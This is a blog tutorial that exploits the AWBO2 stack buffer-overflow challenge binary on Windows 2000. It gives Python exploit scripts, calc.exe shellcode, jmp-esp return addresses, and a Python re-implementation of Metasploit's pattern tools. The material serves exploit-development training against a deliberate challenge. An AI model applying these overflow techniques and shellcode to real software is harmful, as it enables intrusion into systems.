In this series of blog posts, I will be documenting my journey into the art of exploitation. My goal for this series is to experiment with some of the challenges that are out there and hopefully provide some guidance for others in my shoes. I am targeting those of you with a moderate amount of experience in exploitation. Hopefully, I will further my own knowledge and yours, the reader's.
What you’ll need:
- Immunity Debugger
- Pvefindaddr plugin
- Windows 2000 SP4 Virtual Machine
In this first post we’re going to look at awbo2.exe. The Advanced Windows Buffer Overflows were written by Lurene Grenier, formerly of Sourcefire’s VRT.
To quote:
At Defcon XIV, Immunity trotted out the first iteration of their NOP cert test, and I had the pleasure of giving it a test run. I still think it’s a great indicator of ability, despite the Immunity tools focus; I’m not a user of any of their tools generally, but I managed to pull off the hardest level test in a modest time. It got us thinking on the way home, where does one go from the bar set by the NOP to get to the next level in terms of exploit development skill? In this vein I’ve thrown together a few windows executables, and in a nod to Gera of Core, they’re called Advanced Windows Buffer Overflows (AWBOs).
To follow along, you can download the binary, as well as the other challenges, from the following URL:
Before we get started, there are a few rules we need to follow:
- All exploits are performed in Windows 2000 SP4 unless otherwise specified. Sometimes, otherwise will be specified.
- Exploits will use the provided shellcode, or ret2lib.
- You may not return to hard coded stack addresses.
- No source code will be provided – just like the NOP cert (one of the most hardcore exploit certs IMO).
You can find the shellcode below:
# windows/exec - 121 bytes
# EXITFUNC=seh, CMD=calc.exe
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" .
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" .
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" .
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" .
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" .
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" .
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" .
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" .
"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
Before any engagement like this, the first step is to study the target. As per rule #1, we will be working on Windows 2000 SP4. Run the binary and examine what happens:
The first thing you should notice is that there is an INT3 instruction right at the beginning of the application followed by:
0040100D 8D85 FCFBFFFF    LEA EAX,DWORD PTR SS:[EBP-404]
00401013 8945 FC          MOV DWORD PTR SS:[EBP-4],EAX
00401016 8D8D FCFBFFFF    LEA ECX,DWORD PTR SS:[EBP-404]
These three instructions set up a 1028-byte (0x404) stack buffer to take in our input and store a pointer to that buffer at [EBP-4]. Go ahead and hit play a couple of times to start the application, then send it some junk data.
It looks like we have enough information to go ahead and exploit the application. Let's start things off by writing a simple template (in Python) to crash the application. Use Metasploit's pattern_create to generate a pattern 1036 bytes long; this will be our junk data:
junk = ("metasploit pattern here")
print "\n[-] Something went wrong...\n"
After you've saved your exploit, pipe the data over to awbo2.exe:
So far so good: we've crashed the application, but we didn't overwrite EIP. Currently, EAX and ECX contain our junk data and we have an access violation at 0x69423169. The access violation happens because this isn't a real address in memory; it is part of our pattern. Using pattern_offset we can find out exactly where in the buffer a real address has to go:
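As an added example (not the post's own script, and written in Python 3 rather than the Python 2 of the walkthrough), here is a small re-implementation of what pattern_create and pattern_offset do, so you can see how the faulting value maps back to a position in the buffer. The debugger shows 0x69423169, which in memory is the little-endian bytes "i1Bi"; in a 1036-byte pattern those bytes sit at offset 1024, exactly the distance from the buffer at [EBP-404] to the pointer saved at [EBP-4].

```python
import string
import struct

# Added example, not the post's script: a small re-implementation of what
# Metasploit's pattern_create / pattern_offset do. The pattern cycles through
# Aa0Aa1...Aa9Ab0...Zz9; the crash value 0x69423169 and the 1036-byte
# length are the ones used in the walkthrough above.


def pattern_create(length):
    """Return the first `length` bytes of the cyclic pattern."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks).encode("ascii")[:length]
    return "".join(chunks).encode("ascii")[:length]


def pattern_offsets(value, length):
    """Every offset at which a 32-bit register value occurs in the pattern.
    The debugger prints 0x69423169, but on x86 memory holds it little-endian
    (69 31 42 69 = b'i1Bi'), so the value is packed with '<I' before searching."""
    needle = struct.pack("<I", value)
    pattern = pattern_create(length)
    hits = []
    idx = pattern.find(needle)
    while idx != -1:
        hits.append(idx)
        idx = pattern.find(needle, idx + 1)
    return hits


def pattern_offset(value, length):
    """The single offset for a value, or -1 if it is absent or ambiguous
    (more than one hit means the value is not unique in this pattern)."""
    hits = pattern_offsets(value, length)
    return hits[0] if len(hits) == 1 else -1


if __name__ == "__main__":
    crash_value = 0x69423169  # access violation address from the post
    print(pattern_create(1036)[:24].decode())  # Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7
    print(pattern_offset(crash_value, 1036))   # 1024 == 0x404 - 4
```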
Now restart the application and keep stepping through until the call into kernel32 is made. We need a real address at that spot to get past the first access violation and, hopefully, reach the overwrite of EIP. Grab any address from here and edit our Python script:
addr = "\xda\x48\xe8\x77" # addr from kernel32
print "\n[-] Something went wrong...\n"
Now rerun the python script:
Great! Now that we own EIP, things should be downhill from here. ESP currently points to our junk2 data ("\x42"), and if you look a little closer at the stack, we own nSEH and SEH as well:
Now, we can do one of two things. We can exploit this via an SEH overwrite, or we can keep things simple and just place our shellcode at ESP and jump to it. For now, we're going to place our shellcode at ESP and jump to it. Open a new instance of Immunity Debugger and search for our jmp esp instruction (make sure to open awbo2.exe and play it before you search):
Now edit our python script with one of the addresses in the j.txt file:
addr = "\xda\x48\xe8\x77" # addr from kernel32
EIP = "\x8b\x94\xf8\x77" # jmp esp => ntdll.dll
shellcode = "\xcc" * 1000
print junk + addr + junk2 + EIP + shellcode
print "\n[-] Something went wrong...\n"
Run the script, but this time, before you step over the break at the beginning, set a breakpoint at our jmp esp instruction at 0x77f8948b, then hit play:
When you step over this instruction, you should land in our sled of int3 instructions:
Almost there! Edit our script to take our shellcode from before.
addr = "\xda\x48\xe8\x77" # addr from kernel32
EIP = "\x8b\x94\xf8\x77" # jmp esp => ntdll.dll
# windows/exec - 121 bytes
# EXITFUNC=seh, CMD=calc.exe
shellcode = ("\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01"
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01"
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2"
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89"
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b"
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a"
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7"
"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00")
print junk + addr + junk2 + EIP + shellcode
print "\n[-] Something went wrong...\n"
Run the script; if everything was successful, calc.exe should spawn!
Success! We’ll save SEH for another walkthrough for now.
Coming next is awbo3.exe.
Shouts to:
Corelan Team for making some awesome tutorials
Pusscat for making some pretty fun challenges
MC for always answering my questions
J0e for everything he’s done for me